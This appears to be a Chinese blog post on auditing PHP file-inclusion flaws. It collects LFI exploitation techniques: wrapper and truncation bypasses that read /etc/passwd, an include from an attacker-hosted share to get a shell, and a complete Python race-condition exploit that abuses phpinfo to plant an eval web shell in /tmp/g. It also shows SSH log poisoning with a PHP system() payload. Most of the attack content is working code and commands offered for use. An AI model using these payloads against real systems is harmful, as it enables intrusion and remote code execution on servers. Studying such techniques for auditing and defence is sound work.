PHP代码审计 文件包含专题

淩亂°似流年 2022-10-27 13:49 250阅读 0赞

基础分析

LFI
任意文件包含原理源码:即对包含文件没有进行过滤导致

  1. <? php
  2.  $f = $_GET['f'];
  3.  include_once('sys/config.php');
  4.  include($f);
  5. ?>
  6. 或者
  7. <?php
  8. include($_GET['f']);
  9. ?>

LFI漏洞利用思路总结

利用条件:

在php.ini文件中配置两个参数相关的协议
allow_url_fopen :on 默认开启 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。
allow_url_include:off 默认关闭,该选项为on便是允许 包含URL 对象文件等。
在这里插入图片描述

特殊技巧

技巧1.存在文件包含时,但限制后缀时的包含技巧

  1. <?php
  2. $file = $_GET['file'].".php";
  3. include($file);
  4. ?>
  5. #如上面的包含
  7. #绕过思路1-->可以利用zip伪协议或者phar伪协议的思路去绕
  8. zip://a.png%23a
  9. phar://shell.png/shell
  10. #打包一个a.php的内容为a.zip,然后把a.zip改为a.png然后构造伪协议读取就ok了
  12. #绕过思路2-->利用截断思路去绕
  13. #几个典型的
  14. ?file=C://Windows//win.ini%00 (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29-nts无效)
  15. ?file==../../../../../../../../../etc/passwd%00 (需要 magic_quotes_gpc=off,PHP小于5.3.4有效)
  16. 路径长度截断:
  17. ?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.(php版本小于5.2.8(?)可以成功,linux需要文件名长于
  18. 4096,windows需要长于256)
  19. 点号截断:
  20. ?file=../../../../../../../../../boot.ini/………[…]…………(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于
  21. 256)

在这里插入图片描述
技巧2.allow_url_include 关闭时 Getshell

  1. 攻击机开启共享
  2. /1.php?file=//attacker/1.php
  3. 创建webdav服务,shell文件放入目录包含即可
  4. >docker run -v /root/webdav:/var/lib/dav -e ANONYMOUS\_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
  5. Shell文件放入/root/webdav/data
  6. /1.php?file=//attacker/1.php

技巧3
session + lfi getshell

  1. session.upload\_progress.enabled启用时,文件上传会产生进度文件
  2. /var/lib/php5/sess\_
  3. /var/lib/php/sess\_

原理

技巧4
phpinfo+lfi getshell
原理
exp攻击

  1. #!/usr/bin/python 
  2. import sys
  3. import threading
  4. import socket
  6. def setup(host, port):
  7.     TAG="Security Test"
  8.     PAYLOAD="""%s\r
  9. <?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG
  10.     REQ1_DATA="""-----------------------------7dbff1ded0714\r
  11. Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
  12. Content-Type: text/plain\r
  13. \r
  14. %s
  15. -----------------------------7dbff1ded0714--\r""" % PAYLOAD
  16.     padding="A" * 5000
  17.     REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
  18. Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
  19. HTTP_ACCEPT: """ + padding + """\r
  20. HTTP_USER_AGENT: """+padding+"""\r
  21. HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
  22. HTTP_PRAGMA: """+padding+"""\r
  23. Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
  24. Content-Length: %s\r
  25. Host: %s\r
  26. \r
  27. %s""" %(len(REQ1_DATA),host,REQ1_DATA)
  28.     #modify this to suit the LFI script 
  29.     LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r
  30. User-Agent: Mozilla/4.0\r
  31. Proxy-Connection: Keep-Alive\r
  32. Host: %s\r
  33. \r
  34. \r
  35. """
  36.     return (REQ1, TAG, LFIREQ)
  38. def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
  39.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  40.     s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  42.     s.connect((host, port))
  43.     s2.connect((host, port))
  45.     s.send(phpinforeq)
  46.     d = ""
  47.     while len(d) < offset:
  48.         d += s.recv(offset)
  49.     try:
  50.         i = d.index("[tmp_name] => ")
  51.         fn = d[i+17:i+31]
  52.     except ValueError:
  53.         return None
  55.     s2.send(lfireq % (fn, host))
  56.     d = s2.recv(4096)
  57.     s.close()
  58.     s2.close()
  60.     if d.find(tag) != -1:
  61.         return fn
  63. counter=0
  64. class ThreadWorker(threading.Thread):
  65.     def __init__(self, e, l, m, *args):
  66.         threading.Thread.__init__(self)
  67.         self.event = e
  68.         self.lock =  l
  69.         self.maxattempts = m
  70.         self.args = args
  72.     def run(self):
  73.         global counter
  74.         while not self.event.is_set():
  75.             with self.lock:
  76.                 if counter >= self.maxattempts:
  77.                     return
  78.                 counter+=1
  80.             try:
  81.                 x = phpInfoLFI(*self.args)
  82.                 if self.event.is_set():
  83.                     break                
  84.                 if x:
  85.                     print "\nGot it! Shell created in /tmp/g"
  86.                     self.event.set()
  88.             except socket.error:
  89.                 return
  92. def getOffset(host, port, phpinforeq):
  93.     """Gets offset of tmp_name in the php output"""
  94.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  95.     s.connect((host,port))
  96.     s.send(phpinforeq)
  98.     d = ""
  99.     while True:
  100.         i = s.recv(4096)
  101.         d+=i        
  102.         if i == "":
  103.             break
  104.         # detect the final chunk
  105.         if i.endswith("0\r\n\r\n"):
  106.             break
  107.     s.close()
  108.     i = d.find("[tmp_name] => ")
  109.     if i == -1:
  110.         raise ValueError("No php tmp_name in phpinfo output")
  112.     print "found %s at %i" % (d[i:i+10],i)
  113.     # padded up a bit
  114.     return i+256
  116. def main():
  118.     print "LFI With PHPInfo()"
  119.     print "-=" * 30
  121.     if len(sys.argv) < 2:
  122.         print "Usage: %s host [port] [threads]" % sys.argv[0]
  123.         sys.exit(1)
  125.     try:
  126.         host = socket.gethostbyname(sys.argv[1])
  127.     except socket.error, e:
  128.         print "Error with hostname %s: %s" % (sys.argv[1], e)
  129.         sys.exit(1)
  131.     port=80
  132.     try:
  133.         port = int(sys.argv[2])
  134.     except IndexError:
  135.         pass
  136.     except ValueError, e:
  137.         print "Error with port %d: %s" % (sys.argv[2], e)
  138.         sys.exit(1)
  140.     poolsz=10
  141.     try:
  142.         poolsz = int(sys.argv[3])
  143.     except IndexError:
  144.         pass
  145.     except ValueError, e:
  146.         print "Error with poolsz %d: %s" % (sys.argv[3], e)
  147.         sys.exit(1)
  149.     print "Getting initial offset...",  
  150.     reqphp, tag, reqlfi = setup(host, port)
  151.     offset = getOffset(host, port, reqphp)
  152.     sys.stdout.flush()
  154.     maxattempts = 1000
  155.     e = threading.Event()
  156.     l = threading.Lock()
  158.     print "Spawning worker pool (%d)..." % poolsz
  159.     sys.stdout.flush()
  161.     tp = []
  162.     for i in range(0,poolsz):
  163.         tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
  165.     for t in tp:
  166.         t.start()
  167.     try:
  168.         while not e.wait(1):
  169.             if e.is_set():
  170.                 break
  171.             with l:
  172.                 sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
  173.                 sys.stdout.flush()
  174.                 if counter >= maxattempts:
  175.                     break
  176.         print
  177.         if e.is_set():
  178.             print "Woot! \m/"
  179.         else:
  180.             print ":("
  181.     except KeyboardInterrupt:
  182.         print "\nTelling threads to shutdown..."
  183.         e.set()
  185.     print "Shuttin' down..."
  186.     for t in tp:
  187.         t.join()
  189. if __name__=="__main__":
  190.     main()

技巧5
LFI SSH Log

  1. \>ssh '<?php system($\_GET\['c'\]); ?>'@192.168.0.107
  2. >http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls

发表评论

表情:
评论列表 (有 0 条评论,250人围观)

还没有评论,来说两句吧...

相关阅读

    相关 php代码审计(2)

    这个语言怎么这么没有节操。。我感觉它是什么框架都有自己的特色,然后特色多起来自成一派加入新版本里去了就。框架还好几个。大杂烩啊。不愧是脚本语言。 今天发现我太蠢了,应该跟着w

    - 日理万妓- 日理万妓/ 0/ 244 阅读

    相关 PHP 代码审计文件删除

    0x00:前言 CMS 后台很多栏目有上传文件功能,上传漏洞先暂时搁浅,在代码处理的时候,有删除旧文件这个操作,所以先审计下看有没有删除文件的漏洞。 0x01:代码追

    Bertha 。Bertha 。/ 0/ 311 阅读